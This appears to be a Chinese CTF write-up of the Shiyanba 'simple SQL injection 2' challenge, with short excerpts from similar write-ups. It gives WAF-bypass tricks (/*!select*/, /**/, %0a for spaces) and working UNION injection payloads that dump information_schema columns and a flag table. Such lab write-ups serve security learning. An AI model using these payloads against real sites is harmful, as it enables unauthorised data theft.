實驗吧 簡單的sql注入之2

2021-09-02 01:46:29 字數 891 閱讀 3656

burp fuzz 發現過濾了

select --  ) 空格
而且它是直接die('sqli detected!'),無法雙寫繞過,換大小寫試一下,也被過濾了。無法大小寫繞過。

%0aselect%0a無法繞過,

/**/select/**//*!select*/可以繞過

由於無法使用),所以我們無法使用函式,報錯和database()都無法使用,無法獲取資料庫名,但是我們可以嘗試將所有的資料表都爆出來。

查列名

?id=-1'union/*!select*/column_name%0afrom%0ainformation_schema.columns%0awhere%0atable_name='flag'%23

查字段

?id=-1'union/*!select*/flag%0afrom%0aflag%23

flag

報錯注入,繞過技巧(%0a替代空格,/*!*/,)

實驗吧 簡單的SQL注入2

首先輸入1,發現有將資料庫的查詢結果顯示出來 輸入單引號,發現錯誤,這時候可以猜測後台查詢語句 select name from table where id 可以先嘗試萬能密碼 查詢語句就變成 select name from table where id 會把所以結果都顯示出來一共三條記錄 接下...

實驗吧 簡單sql注入之3

簡單sql注入之3 以下皆根據布林盲注手工注入步驟並且借助burpsuite的intruder功能對資料庫名 表名等等進行爆破 需要注意 0x00 爆資料庫 方法一 可以通過burpsuite攔截資料報,更改ascii值重發獲取 1 and length database n 資料庫名長度是4 1 ...

實驗吧Web 中 簡單的sql注入之2

輸入union select order by這些關鍵字會提示sqli detected 說明對於關鍵字有防護 輸入1 union也會提示sqli detected 但是如果去掉空格 1union,則會返回正常,1 and 1 1 無空格 也返回正常 所以可能是過濾了空格。於是用 或 代替掉空格。1...